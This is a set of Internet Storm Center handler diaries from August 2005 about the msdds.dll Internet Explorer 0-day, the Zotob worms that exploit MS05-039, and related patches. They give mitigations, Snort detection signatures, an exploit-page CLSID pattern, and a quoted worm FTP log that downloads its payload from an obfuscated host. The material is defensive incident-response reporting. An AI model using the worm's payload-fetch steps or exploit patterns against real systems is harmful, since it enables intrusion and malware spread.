You can find more detail information following site http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1. If you are not using the LPD service, disable it. Don't forget to patch it. The miscreants will use this exploit for compromise your system.

More about Msdds.dll issue

The Microsoft updated their the Msddsl.dll exploit issue. The updated version contains additional information regarding what applications ship the affected DLL and are configured in a vulnerable state.

Following statements are summary of updated information.

The affected versions of Msdds.dll are 7.0.9064.9112 and 7.0.9446.0.
Customers who have Msdds.dll with version 7.0.9955.0, 7.10.3077.0, or
higher on their systems are not affected by this vulnerability.

The Microsoft DDS Library Shape Control (Msdds.dll) does not ship in
the .NET Framework.

Microsoft Office 2003 are not affected by this vulnerability. (ships a higher version dll)

Microsoft Access 2003 are not affected by this vulnerability. (ships a higher version dll)

Microsoft Visual Studio 2003 are not affected by this vulnerability. (ships a higher version dll)

Microsoft Visual Studio 2002 Service Pack 1 are not affected by this vulnerability. (ships a higher version dll)

Microsoft Office XP Service Pack 3 are not by default affected by this vulnerability. However, its only in a vulnerable configuration if VS runtime library files are in the search path for Internet Explorer. These files are Msvcr70.dll and Msvscp70.dll. For instance by placing them in the same directory as Msdds.dll or in the %windir%/system32 directory could expose Office XP customers to this issue.

You can find the workarounds from our


Kevin Hong - khong-at-kisa.or.kr/Handler On Duty

Published: 2005-08-18

Infocon gone yellow; Patch available for Internet Explorer (.Net) 0day Exploit; Open letter; OS-X Patches; 1433 scans after Zotob; Zotob MSRT updated

Infocon gone Yellow

The Infocon status is now yellow, due to the MSDDS.DLL exploit now available. We moved to Yellow as we feel widespread malicious use of this vulnerability is imminent, and the workarounds shown here provide sufficient countermeasures to be applied quickly. We expect to move back to green by the end of the day or early tomorrow.

Internet Explorer (.Net) 0day msdds.dll Exploit & Patch

Yesterday, FrSIRT (aka K-otik) released a working 0-day exploit against
a .Net component with is accessible remotely via Microsoft Internet Explorer.

Update 1600 EST:


Microsoft has released a security advisory with regards to MSDDS.DLL.

The exploit will open a remote shell if you visit a malicious website.
Other payloads are possible. The exploit will have all the privileges
assigned to the user running Internet Explorer. We do not see any use of
the exploit at this time, but consider widespread use imminent.

<H3>Am I Vulnerable ?</H3>

You are only vulnerable if you have "msdds.dll" installed on your system.
By default, Windows will not install this DLL. See below for details.
The DLL can be found in Program Files\Common Files\MicrosoftShared\MSDesigners7. Note that the directory may be named
differently in non-english versions of Windows.

The vulnerable version is: 7.0.9064.9112 . Later versions are not
vulnerable (in particular 7.10.x)


While there are no official patches available, there are a number of

* Set "kill bit" for the ActiveX component. We released a number of scripts
to set the "kill bit" for the affected ActiveX component. This will prevent
use of the vulnerable ActiveX component by Internet Explorer. msdds.dll may
still be used by local applications (and this is ok). But this may break
activex applications accessed via the browser, if they make use of this
vulnerable function.
* you can make the same change using the registry editor. Change this key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EC444CB6-3E7E-4865-B1C3- 0DE72EF39B3F}\Compatibility Flags=0x00000400" [Jerry] I added a space in the key to avoid the above mentioned content filter rule [John].

* Remove the vulnerable DLL from your system. This may break various applications that installed the DLL.

* Use 'DropMyRights' to limit the impact of an exploit.

* Use an alternative browser (Firefox, Opera) which does not provide ActiveX.

Note that other browsers may in fact use the MSIE engine to render code, for example ActiveX such as this one. Netscape 8 for example has this capability, and may be vulnerable. This has not yet been confirmed. [AB]

* If you are able to apply content filters to your internet gateway (e.g. a proxy server), filter for this string:

(in order to allow you to still visit this page, we substituted the '-' with the word '(dash)' ...)


How do I recognize a web page which contains exploit code?

Look for this pattern:

<object classid="EC444CB6(dash)3E7E(dash)4865(dash)B1C3(dash)0DE72EF39B3F"></object>

If you visit a page with the exploit, it will load very slowly. In some
cases, we got a warning that the system is low on virtual memory.

Current virus scanners may recognize the exploit using rules developed for
older, similar exploits.

What software may install the DLL?

Here is a list of applications that may install this component:

(Disclaimer: We can't test them all... but it should help you prioritize)

MS Visual Studio .Net

.Net Framework 1.1

Microsoft Office (2000, 2002, XP) [Karl, Juha-Matti]

Microsoft Project

Visio [Chris]

Access 11 (2003) runtime [Scott]

ATI Catalyst driver installed by newer ATI video cards [Eric]
MSDDS.DLL is not found on Win2003 SP1 SERVER with .net installed (not Visual Studio .net). [Andy].

Not all default Office 2000 installs have msdds.dll installed. [Emmanuel]

We get conflicting reports, likely due to various configuration and install choices. Please verify yourself the version before concluding that you are not vulnerable.

The version of MSDDS.DLL installed with Office 2003 is not vulnerable.

If you test your system using the PoC exploit, please let us know if

it succeeded, and what version of MSDDS.DLL you are using. Version 7.10.3077.0 may not be vulnerable (according to Secunia and our testing). [Juha-Matti]

Version 7.0.9064.9112 is vulnerable [Gilles].

MSDDS Trivia:

- MSDDS stands for "Microsoft Design Tools - Diagram Surface".

- you sometimes may find the (wrong) spelling of msdss in earlier versions of our diaries.
Related Links:


Open letter from the handlers

It merits pointing out that this particular vulnerability really isn't
0-day, it's more like 380-day, as the underlying vulnerability has
been around for a LONG TIME.

See http://www.informationweek.com/story/showArticle.jhtml?articleID=22102487&tid=5979
for example.

Microsoft (and others; sorry Tom) have been recommending that users set
"kill bits" on individual ActiveX/COM objects for a year now, as an
ultimate fix for the issue. In MS05-038's writeup:

"Because not all COM objects are designed to be accessed through
Internet Explorer, this update sets the kill bit for a list of Class
identifiers (CLSIDs) in COM objects that have been found to exhibit similar
behavior to the JVIEW Profiler vulnerability that is addressed in Microsoft
Security Bulletin MS05-037. To help protect customers, this update prevents
these CLSIDs from being instantiated in Internet Explorer. For more
information about kill bits, see Microsoft Knowledge Base Article 240797."

Have we all forgotten the lessons of taking a default-permit stance with
regard to defense? The underlying vulnerability is not that javaprxy.dll
(MS05-037) or shell32.dll (MS05-038) or msdds.dll can be invoked from a
web page; the real issue is that the MSIE Renderer, which can be invoked
from nearly every Microsoft application (Office, Outlook, ...) is allowed
to access any object within the operating system without any controls

There should be a default-deny setting, allowing only a white-list of
"known good" ActiveX objects. Microsoft, this situation demands a more
effective and encompassing solution, it needs to be enabled by default,
and it cannot afford to wait for Vista & IE7 to be released.

Update 2005-08-18 23:35 UTC: Reader M. writes in to remind us that
there are a couple of ways that technically-savvy users can harden MSIE
against this sort of attack:

"They already have two available: the Administrator Approved list at
Internet Settings\AllowedControls
which is enabled by setting "Run ActiveX Controls and Plug-ins" (value 1200)
in the Internet security zone to "Administrator Approved"
This has been available since IE 5 and works in IE 6 on both XP Pro and
XP Home. The details are documented in KB article 182569.

There is also a way to implement a whitelist using the new add-on management
functionality that was added in IE 6 on XP SP2. Just set the "Deny all
Add-ons unless specifically allowed in the add-on list." The details are
in the technet documentation that describes the new security features in IE
on XP SP2." Thanks! [ Now, if only we could get that enabled by the
next round of kill-bit patches. ;-) ]

Apple OX-X 2005-007 patches

Apple released patch set #7 for this year:

A number of critical issues are fixed by this patch sets. Highlights include
Apache2, Bluetooth and zlib. It is recommended that OS-X users apply these patches expeditiously. For some of these issues, exploit code is available for other platforms and may be adapted to OS-X.

Make sure you use version 1.1. of this patch set. Initially, Apple released 1.0 but it was missing a critical 64 bit library and broke some applications. [Harry].

Port 1433 scans after Zotob infection

One reader reported that he obsevered a significant increase in port 1433 scanning after a host in his network was infected with Zotob. The implication may be that miscreants are monitoring for Zotob infected machines and scan them assuming weak security practices in the respective network.

Malicious Software Removal Tool updated for Zotob

This Alert is to notify you that on 17 August 2005 the Microsoft Windows
Malicious Software Removal Tool has been updated with added detection
and cleaning capabilities for the following Malicious Software:

* Zotob.A
* Zotob.B
* Zotob.C
* Zotob.D
* Zotob.E
* Bobax.O
* Esbot.A
* Rbot.MA
* Rbot.MB
* Rbot.MC

The updated version of the Microsoft Windows Malicious Software Removal
Tool is available for download from the Download Center at this

NOTE: This updated version is currently NOT available on Windows Update,
Microsoft Update or through Windows Server Update Services.

- Thank you Susan!


We received a lot of great input from readers.
I started acknowledging reader input using square brackets and their first name.
THANKS!!! Keep it coming!!!
Johannes, Adrien, and the ISC handler team


Published: 2005-08-17

Possible MSIE Zero-Day; Analysis of Zotob versions; Why are we still Green;

Possible MSIE Zero-Day

FRsirt posted a possible zero-day exploit against Microsoft Internet Explorer (MSIE) 6. According to the notes posted with the exploit, it should open a remote shell by exploiting Msdds.dll.

In order to be vulnerable 'msdds.dll' has to be installed on your system. By
default this is not installed on Windows XP or 2000. However If you install Visual Studio .Net, msdds.dll will be installed. Some of the .Net SDKs may include the component as well, but we where not able to verify this (please let us know if you see msdds.dll without Visual Studio .Net).

Antivirus scanners are able to detect this exploit as "Iframebof Exploit" (Kaspersky) or "JS.Bofra.A" (Bitdefender). The may trigger on the shell code, which is bound to change if shell code with different functionality is used.

Analysis of Zotob Versions.

As promised earlier, here is my analyze as of 11:30 am CDT. Hopefully I have included enough information to help those that have been infected with figuring out exactly which version you are infected with.

Good Afternoon Internet Users

Yes the fun Does continue. The little fellows that wrecked havoc on CNN, ABC, NY Times and other "rumored" victims are still continuing. Symantec has identified two more versions of Zotob so were are now up to version G.

Thought I would try to compile some info and see if we can determine the actual differences between these. It may help some of you to determine just exactly what version of these rascals you are dealing with. So here goes my perhaps feeble attempt at trying to make heads or tails out of this mess.

After having killed a couple of trees printing out the Symantec reports on each of these so that I could review off line (I don¤Ô¤±¤Í¤½ comprehend very well if I don¤Ô¤±¤Í¤½ hold the document in my hands while I read), here is what I have come up with.

CAUTION: We do observe a large variety of Bots taking advantage of MS05-039. Not all of them are characterized as Zotob, and some may escape AV detection all together. Do not assume that you are "safe" if you don't find Zotob, but if you are vulnerable to the PNP exploit. Some of the other bots match generic SDBot or RBot signatures.


Executable size: 22,528 bytes

Executable Name: botzor.exe

Ports: TCP &#65533; 445,8080,33333

Aliases: Zotob.A [F-Secure], W32/Zotob.worm [McAfee], W32/Zotob-A [Sophos], WORM_ZOTOB.A [Trend]

Other details &#65533; Opens FTP server on port 33333, copies 2pac.txt and haha.exe to the system directory, adds itself to the run and run services in the registry. Modifies the hosts file to prevent updating of antivirus and security programs from updating.


Executable size: 27,648 bytes

Executable Name: csm.exe

Ports: TCP &#65533; 445,8080,33333

Aliases: Zotob.B [F-Secure],W32/Zotob.worm.b [McAfee],W32/Zotob-B[Sophos],
WORM_ZOTOB.B [Trend Micro]

Other details &#65533; Opens FTP server on port 33333, copies 2pac.txt and haha.exe to the system directory, adds itself to the run and run services in the registry. Modifies the hosts file to prevent updating of antivirus and security programs from updating.


Executable size: 41,984 bytes

Executable Name: per.exe

Ports: TCP &#65533; 445,8080,33333

Other details &#65533; Mass-mailing worm uses a predefined list of recipient names appending the domain names that it gathers from an infected computer. Contains its own SMTP engine to email to the addresses that it finds. Opens FTP server on port 33333, adds itself to the run and run services in the registry. Modifies the hosts file to prevent updating of antivirus and security programs from updating.


Executable size: 51,326 bytes

Executable name: windrg32.exe

Ports: TCP &#65533; 6667,1117,445

Other details &#65533; Opens FTP server on port 11173, attempts to end a variety of processes , Modifies the registry and deletes a variety of registry entries, and deletes a variety of files from the system and program files directories, adds itself to the run and run services in the registry. Modifies the hosts file to prevent updating of antivirus and security programs from updating.


Executable size: 10,366 bytes

Executable Name: wintbp.exe

Ports: TCP &#65533; 8594,8080,445, UDP - 69

Aliases: WORM_RBOT.CBQ [Trend Micro]

Other details &#65533; Opens TFTP server on port UDP 69, Connects to IRC server at on TCP port 8080 to listen for update instructions, adds itself to the run in the registry.


Executable size: 10,878 bytes

Executable name: wintbpx.exe
Ports: TCP 445

Other details &#65533; Opens multiple TCP ports. Connects to IRC server at to listen for update instructions, adds itself to the run in the registry, creates a file named %Temp%\[NUMBER] which if successful contains TFTP scripts to download additional files.


Executable size: 73,728 bytes

Executable name: windrg32.exe

Ports: TCP 445,6667,1171

Aliases: W32.Drudebot.A

Other details &#65533; Attempts to connect IRC servers on port 6667, Opens a TFTP server on port 1171, attempts to end a variety of processes , Modifies the registry and deletes a variety of registry entries, and deletes a variety of files from the system and program files directories, adds itself to the run and run services in the registry, creates a file named %Temp%\[NUMBER] which if successful contains TFTP scripts to download additional files. Modifies the hosts file to prevent updating of antivirus and security programs from updating.

This is the information that I have as of this Diary update. We will keep you posted if anything changes.

Update: Symantec has now updated it's removal tool to include removal for all of the current versions of the Zotob virus. You can find it on Symantec's web site at:

Why our Infocon is green

(Jim Clausing for Deb who is in a meeting) We've gotten some e-mail asking why, with all the apparent outbreaks of worms, our Infocon remains at green. The answer is pretty simple. We first suggested in the diary that these exploits would probably turn into worms (and warned users/administrators to patch now) on Friday. We raised Infocon to yellow Saturday morning (UTC) because we thought it likely that the worms would show up over the weekend. We were right. They first showed up Sunday morning. Frankly, the Infocon was raised when there was still a chance to do something about the situation. We lowered it back to green Tuesday morning (UTC) when the scanning effectively became part of the normal background noise on the internet. Our stance has always been we raise Infocon to get the attention of the community and we leave it there the shortest time possible. Unfortunately, there have been some high profile cases of organizations that didn't or couldn't patch in a timely fashion so it suddenly became a big story in the mainstream media yesterday. While this is regrettable, as one of the other handlers stated in e-mail, "Close the barn door, that horse ran out last week."

Deb Hale

Handler on Duty


Published: 2005-08-16

Another PnP Worm; Feedback from Microsoft; Reader Mailbag; Johannes Redux; Apple Security Patches

Another PnP worm on the loose...

CNN reported a worm outbreak this afternoon involving their network, ABCNews, NYTimes, as well as Capitol Hill.

Information is still flowing on this situation, but here's what we have so far:

Symantec just released info on the W32.Zotob.E worm

Trend Micro also released information under WORM_RBOT.CBQ.

McAfee released information as well:

This is an IRC bot worm, and will scan for TCP port 445, and for file shares. McAfee reports in it's bulletin that systems not patched for MS05-039 will continually reboot.

It exploits known vulnerabilities, and the patch is available from microsoft here:

More updates coming as we analyze and gather more information!

A few words from the Microsoft Security Response Center

Mike from the MSRC sent an e-mail with "clarification regarding changing the default setting of NULL sessions and what the impact of changing these settings does to the threat profile of the PnP vulnerability addressed in MS05-039"

The information has been published in the
updated yesterday.

Take note of the section on mitigating factors.

Mike also mentioned that the McD's Bomber Message Malware mentioned in
is exploiting the vulnerability that is patched with

Reader Mailbag

Kerry Tyler, a self described "Windows Server Wrench" offered the following:

I just wanted to drop a note of thanks for this weekend's coverage of the MS05-039 fun. I came back to the office from lunch on Friday to a blinky green globe in my System Tray--perfect timing to remind me that we still have a couple of stragling Windows 2000 Servers around that needed patched RIGHT THEN, no waiting until our usual Sunday morning patching with the 2K3 boxes. Disaster mostly averted, only held up by crappy Change Management procedures. (had one machine get hit, but mosly a failed exploit attempt, as they did cause the machine to restart)

Many thanks on a job well done, and glad to see some yellow--keeps us on our toes! ;-)

I think Josh summed it up best in his reply ..

I can't speak for the other handlers, but I believe the consensus
opinion would be that it's messages like this one that motivates us to
do what we do. Thank you for your note, and I'm glad you were able to
avert disaster. :)

Back to InfoCon Green

As Johannes mentioned yesterday, we are back to green. As his addition to the diary is still relevant, it bears repeating.

As of Tuesday, 1:45 AM GMT (Monday 20:45 EDT), we moved back to infocon green.

We moved to 'Yellow' on Friday, after we did see a number of exploits released for last weeks Microsoft Windows vulnerabilities, in particular MS05-039 (PnP) which is exploitable remotely.

As expected, we did see various bots, in particular 'Zotob' take advantage of this vulnerability. At this point, the situation is however static. New bot variations keep getting developed, but they do not add any fundamental new variation of the exploit. We expect that most exploitable systems have been compromised at this point.

The last week showed once more that there is no more patch window. Defense in depth is your only chance to survive the early release of malware. In this particular case, three distinct best practices can mitigate the vulnerability:
- close port 445 at least at the perimeter.

- patch systems quickly.

- eliminate NULL sessions.
Neither one of these measures is perfect, and some may not be applicable to your network (e.g. you may require NULL sessions in some circumstances).

Another development brought to conclusion in this event is the lesser importance of 'worms' with respect to more sophisticated 'bots'. We received a number of bots using the PnP vulnerability. Antivirus scanners did not identify most of them. In many cases, the same bot was packed differently or some function where added to evade detection.

Malware can only develop as fast as it is developing in this case because of extensive code sharing in the underground. The only way we can keep up with this development is by sharing information as efficiently. Being able to do so openly will make it only easier to do this sharing. Please join our effort, and share future observations with us. We will continue to turn them over quickly and make them available via out diaries for everybody to read and to learn from.

I would like to thank in particular handlers Lorna and Tom for their extensive analysis of all the malware submitted.

Yes, the Internet is still "broken", but it was never working all that well to begin with. The Infocon is intended to measure change. We can't stay on yellow for ever.

Johannes Ullrich.

Apple Patches

With all the attention on MS05-039 Apple released a few
yesterday for 10.3.9 and 10.4.2 client and server.

Affected components vary by software version but include:






Directory Services







Security Interface











Directory Services







Security Interface







isc dot chris at gmail dot com

Handler on Duty
Published: 2005-08-15

Back to Green, A Word From Microsoft

A word from the Microsoft Security Response Center

Mike from the MSRC sent an e-mail with "clarification regarding changing the default setting of NULL sessions and what the impact of changing these settings does to the threat profile of the PnP vulnerability addressed in MS05-039"

The information has been published in the updated earlier today.

Take note of the section on mitigating factors.

Thanks Mike.

Back to InfoCon Green

As of Tuesday, 1:45 AM GMT (Monday 20:45 EDT), we moved back to infocon green.

We moved to 'Yellow' on Friday, after we did see a number of exploits released for last weeks Microsoft Windows vulnerabilities, in particular MS05-039 (PnP) which is exploitable remotely.

As expected, we did see various bots, in particular 'Zotob' take advantage of this vulnerability. At this point, the situation is however static. New bot variations keep getting developed, but they do not add any fundamental new variation of the exploit. We expect that most exploitable systems have been compromised at this point.

The last week showed once more that there is no more patch window. Defense in depth is your only chance to survive the early release of malware. In this particular case, three distinct best practices can mitigate the vulnerability:
- close port 445 at least at the perimeter.

- patch systems quickly.

- eliminate NULL sessions.
Neither one of these measures is perfect, and some may not be applicable to your network (e.g. you may require NULL sessions in some circumstances).
Another development brought to conclusion in this event is the lesser importance of 'worms' with respect to more sophisticated 'bots'. We received a number of bots using the PnP vulnerability. Antivirus scanners did not identify most of them. In many cases, the same bot was packed differently or some function where added to evade detection.
Malware can only develop as fast as it is developing in this case because of extensive code sharing in the underground. The only way we can keep up with this development is by sharing information as efficiently. Being able to do so openly will make it only easier to do this sharing. Please join our effort, and share future observations with us. We will continue to turn them over quickly and make them available via out diaries for everybody to read and to learn from.
I would like to thank in particular handlers Lorna and Tom for their extensive analysis of all the malware submitted.
Yes, the Internet is still "broken", but it was never working all that well to begin with. The Infocon is intended to measure change. We can't stay on yellow for ever.

Johannes Ullrich.

McD's Bomber Message Malware

We've had several reports from folks reporting receipt of messages with the subject line "McDonald's bomber jailed for life". This message includes a link to various sites with the common domain lastrez_DONOTCLICK_.com. (_DONOTCLICK_ added for emphasis!)

Visiting the site redirects to a page "mc.html" on the same site that attempts to exploit the MS05-038 bug, creating a file called w.hta. Handler David Goldsmith has called upon the Yesnic registry to stop resolving this domain, and the China-Netcom ISP to stop hosting this site, but at the time of this writing, the site is still operational. Organizations may want to consider blocking the site at to prevent click-happy users from infecting their systems.

Zotob Update

New and improved Zotob(?): Now with mass mailer. Our malware team (mostly Tom and Lorna) are faced with an increasing flood of PNP bots and worms. The
most recent one looks like a Zotob. However, it does include a mass mailer.

This Zotob variant connects to the same IRC server as others, but to a different channel. Strings taht are likely to be used in the Subject line for e-mail sent by this variant: Warning!!, **Warning**, Hello, Confirmed..., Important!, We found a photo of you in ..., That's your photo!!?, Hey!!, OK here is it!. The attachemnet included in the email looks like a zip file.

Other notable strings:
Botzor2 pnp+asn+mail spread. Greetz to good friend Coder. Based On HellBot3. f-secure,sophos ok wait bitchs!!!

URLs set to via the hosts file: most AV vendors and paypal, moneybookers, ebay and amazon.com.

More MS05-039 fun'ness

Over the course of the day we've seen what appears to be more than a handful of new bots exploiting the PnP bug (Note: PnP is not the same as UPnP, and we wonder who thought adding network-aware capabilities to PnP was a good idea). While TCP/445 scanning hasn't increased significantly, it's always a popular target, so we assume attackers are exploiting pre-populated lists of TCP/445 targets now that a "dot-slash" exploit is readily available and reliable.

Part of the uptick in compromises is likely due to existing bots being configured with the new PnP exploit code, highlighting the "blended threat" problem. Existing malware that has been making the rounds for a while receives a new breath of life when new exploit code becomes available, turning up lots of compromised systems.

A few salient points regarding the current PnP attack threat:

+ There are lots of additional 'bots' in addition to Zotob, directly targeting systems or making use of prepopulated target lists;

+ Ensure all systems have NULL session disabled to block the current threats;

+ Block TCP/445 ingress and egress whenever possible to stop incoming attacks, and to detect infected systems leaving your network;

+ Do not rely on TCP/33333 FTP service detection to identify compromised systems as this port is not used consistently in later bot variants;

+ Ensure AV signatures are up-to-date;

+ Patch!

New Zotob variant (Zotob.b)

F-Secure is reporting a new variant in the Zotob worm currently exploiting the PnP vulnerability addressed in MS05-039. The Zotob.B variant uses the same ports (TCP/445 for scanning, TCP/8888 command shell on exploited systems, TCP/33333 for FTP server) as the previous variant, but uses the executable name "csm.exe" with the description "csm Win Updates" in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices to load the worm when the system boots. The Zotob.A uses the executable name "botzor.exe" in the same registry key.

It is not believed that Zotob.B worm possesses any additional characteristics that would make it more of a threat compared to Zotob.A.




Zotob affecting some XP SP2/2003?

Reader Samuli writes in (thanks Samuli!) pointing out that the houseofdabus code used in the Zotob worm to exploit the Microsoft PnP vulnerability addresses in MS05-039 relies on NULL sessions to exploit the target system. Default installations of Windows XP SP2 and Windows 2003 do not have NULL sessions enabled, and thus are not affected by the worm. However, some server roles may require administrators to enable NULL session functionality, such as legacy domain controllers, Microsoft Exchange servers, Microsoft SQL Servers, etc. If you have permitted NULL session access on your managed systems, you may be at risk of infection by one of the Zotob variants.

Administrators can check their Windows XP SP2 systems to identify if NULL sessions are disabled by checking the registry entry HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymoussam, ensuring it is enabled (1). Note that the registry key "restrictanonymous" refers to the ability to anonymously enumerate shares on the system, and does not grant the ability to enumerate user accounts. If you're checking your systems, you may want to set both parameters to enabled to prevent an anonymous attacker from enumerating shares on your system, although this will require testing to ensure it does not break valid applications.

Update: Reader Chuck Croll writes in with the following comments regarding disabling anonymous share browsing:

"Note that if you enable blocking of anonymous share enumeration, by setting HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous to "1", you will break Windows Networking, ie the ability for the browser subsystem to enumerate servers in Network Neighborhood.

A lot of people have no idea what the browser is, and when Network Neighborhood breaks, can't even describe it accurately."

All the more reason to test settings before applying them in a production environment! Thanks Chuck!

It is still vital that organizations apply the most recent patch updates from Microsoft to resolve several vulnerabilities in Windows. While the current Zotob worm may not be able to exploit default installations of Windows XP SP2 and Windows 2003, it certainly won't be long before there is a variant that won't have this limitation.

What's more, there appears to be some confusion with AV vendors as to the vulnerability of Windows 95/98/ME/NT4 systems.
Symantec claims that while these legacy operating systems cannot be infected (likely due to the fact that they aren't vulnerable to the PnP bug), they can be used as propogation vectors if the Zotob code is executed on the system. briefly mentions that Zotob runs on all of these Windows platforms, but does not provide additional information.


Paul Asadoorian from Brown University has written and maintains an excellent paper titled
. Thanks Paul!

-Joshua Wright/Handler-on-duty
Published: 2005-08-14

MS05-039 Worm in the wild

-039 is NOT Microsoft's lucky number

One of our readers, John Smith, submitted this:

"Interesting game of numbers:

SQL Slammer was using bug fixed in MS02-039

Zotob is using bug fixed in MS05-039

Hex 39 is 57 decimal, which is big W (Worm? Windows?) in ASCII."

Update (2005-08-15@10:43UTC): hex 39 is ASCII "9", but hex 57 is ASCII "W". Maybe it's a conspiracy involving the American National Standards Institute (ANSI)? OK, maybe not. -Josh

The technical details:

Starting around 11:30 UTC, we've received several reports on a new worm variant that makes use of MS05-039 to spread. If you're not patched yet, this is your last call.

F-Secure named the critter "Zotob.A",http://www.f-secure.com/weblog/

We've also received a submission of a binary called "pnpsrv.exe", which is recognized by ClamAV as Trojan.Spybot-123. Another reader has contributed evidence that a successful exploit by Zotob.A (or variant)

The worm will download the main payload from the infecting machine. Once a machine is infected, it will become an ftp server itself. It will scan for open port 445/tcp. Once it finds a system with port 445 listening, it will try to use the PnP exploit to download and execute the main payload via ftp.

Important facts so far:
- Patch MS05-039 will protect you
- Windows XP SP2 and Windows 2003 can not be exploited by this worm, as the worm does not use a valid logon.
- Blocking port 445 will protect you (but watch for internal infected systems)
- The FTP server does not run on port 21. It appears to pick a random high port.

Quick FTP log:
  open aaa.bbb.ccc.ddd 31656  user 1 1  get winpnp.exe  quit  
(IP address obfuscated). We'll keep adding to this diary as new information becomes available.

Thanks so far to Johnathan Norman from for a lot of the details.
Other good information can be found at the F-Sececure weblog at
Also see the Microsoft MS05-039 bulletin from last week: http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx Please submit any new code captures via our contact page:
If possible, do not pack/encrypt the uploads, maybe provide an md5 sum to preserve the code in its original beauty.

Shown below are Snort rules, submitted by the members of the Alert Logic Security Research Team:
Jeremy Hewlett, Technical Director of Security Research
Johnathan Norman, Sr. Security Analyst
Chris Baker, Technical Director of Security Operations

alert tcp any any -> any 445 (msg:"EXPLOIT SMB-DS Microsoft Windows 2000 Plug and Play Vulnerability"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|67157a76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000130; rev:1;)

alert tcp any any -> any 139 (msg:"EXPLOIT NETBIOS SMB Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset:4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000131; rev:1;)

alert tcp any any -> any 445 (msg:"EXPLOIT NETBIOS SMB-DS Microsoft Windows 2000 PNP Vuln"; flow:to_server,established; content:"|FF|SMB%"; depth:5;offset: 4; nocase; content:"|2600|"; depth:2; offset:65; content:"|3600|"; offset:110; within:5; content:"|F6387A76|";reference:url,www.microsoft.com/technet/security/Bulletin/MS05-039.mspx; classtype:attempted-admin; sid:1000132; rev:1;)

Handlers contributing to this diary so far:
Daniel Weseman, Johannes Ullrich, Tony Carothers, William Salusky and Donald Smith.


Published: 2005-08-13

PnP Worm out; More on the current Veritas vuln; Microsoft Update and Win 2K3 w/o SP1; new gaim version

PnP Worm Out


Quick update: Several reports that the PNP (MS05-039) worm was released finally. We are just analyzing the code.

We remain at infocon of yellow, but fortunately, we haven't yet seen any worms exploiting the vulnerabilities covered by last Tuesday's Microsoft bulletins. If things stay quiet through Sunday, we'll likely move back to green on Monday, but we reiterate our warning from yesterday, there are enough exploits for these vulnerabilities known to be in the wild that we believe it is only a matter of hours or at most days until they are integrated into a worm.

More thoughts on the current Veritas Backup Exec vulnerability

One of our readers (thanx, Frank) pointed out that although the bulletins concerning the Veritas Backup Exec vulnerabilities only mentioned the possibility of READING data from a vulnerable server, the nature of the NDMP protocol makes it likely that it could be exploited to WRITE data to a server as well. Several people have been working on proof of concept code today, so it probably won't be long before working exploits are in the wild for this one, too. We are hearing reports of exploit attempts in the wild. Again, see yesterday's diary for our recommendations, for blocking port 10000. Also, thanx to Juha-Matti, for pointing out that this vulnerability also exists not just in Backup Exec, but also in NetBackup for NetWare, as well. See the for further details.

Microsoft Update and Win2K3 w/o SP1

Another of our readers, Wolf, brought this issue to our attention. Some admins have chosen not to install Windows 2003 Server SP1 until issues have been worked out. This has led to a problem that the admins may not be aware of. If you use Microsoft Update and choose the Express (recommended) option, it will NOT show the July or August updates, you have to choose Custom updates in order to see them. This could be very dangerous as it may leave the admins believing their servers are current on patches when in fact they are exposed.

new gaim version

Users of the popular gaim multi-protocol instant messenger client are urged to upgrade to 1.5.0 immediately, since this version fixes 3 security bugs. See
http://gaim.sourceforge.net/security/ for details.


Jim Clausing, jclausing_at_isc.sans.org


Published: 2005-08-12

Infocon Yellow; Windows and Backup Exec exploits are out, where are the exploits, NIST drafts, Snort signatures

Infocon: Yellow

Due to a number of very well working Windows exploits for this weeks patch
set, and the zero-day Veritas exploit, we decided to turn the infocon to yellow.

Advice: Use the weekend to patch ALL WINDOWS SYSTEMS. It may be worthwhile to
consider accelerated deployment of the patches even to critical systems if the
weekend is slow anyway. Backup Exec should be firewalled or disabled at this point.

Note: Consider unprotected internet facing machines infected at this point if they do not have this weeks patches applied. Patch and handle them with extra care.

Windows and Backup Exec exploits are out

In case you're waiting to see whether it's worth updating either
Windows or Veritas' Backup Exec, now's the time to do so. Live exploits
are out for both.

Specifically, MS05-039 appears to have 3 live exploits out for
it already, and Backup Exec has at least one exploit out.

We've said it already, but it's worth repeating - get those
patches in soon...

Which exploits are really out?

We've gotten a number of questions from readers about the
exploits we've mentioned over the past few days in the diary. Some of
them are publicly known and easily Google-able. Others are ones that
we've found out about from trusted sources that have asked us to not
share the exploit itself.

Because our goal is to provide timely alerts to the security
community, we generally don't provide the exploit code itself. If it
truly is publicly visible, you'll find it in a few minutes without our
help. And if the exploit is still generally private, we don't want to
be the conduit that accelerates attacks - people with lots of hat colors
read this diary. *smile*

Thanks for understanding.

NIST drafts

NIST has provided
security documents: Creating a Patch and Vulnerability Management
Program, Secure DNS Deployment Guide, Guide to Malware Incident
Prevention and Handling, Guide to Single-Organization IT Exercises,
Guide to Computer and Network Data Analysis: Applying Forensic
Techniques to Incident Response, and Codes for the Identification of
Federal and Federally-Assisted Organizations.

Preliminary Snort signatures for MS exploits

One reader was kind enough to forward some Snort signatures for
malware hitting the recently announced vulnerabilities. Credit for
these signatures goes to Blake Harstein at Demarc.

To not have the lines go on too long, the pcre's have been split
over multiple lines; everything from pcre: to /i"; needs to be
reassembled into one object with no spaces.

#These rules are separated for compatibility with Snort 2.3.3 (>850
#characters per line), If you are using Snort >2.4.0 you can safely
#combine these into a single rule

EXPLOIT CLSID Pattern Matched"; flowbits:isnotset,CLSID_DETECTED;
flowbits:noalert; flowbits:set,CLSID_DETECTED; classtype:not-suspicious;
sid:2002174; rev:2;)

EXPLOIT COM Object Instantiation Memory Corruption Vulnerability (group
1)"; flow:established,from_server; flowbits:isset,CLSID_DETECTED;
classtype:web-application-attack; reference:cve,2005-1990;
sid:2002171; rev:2;)

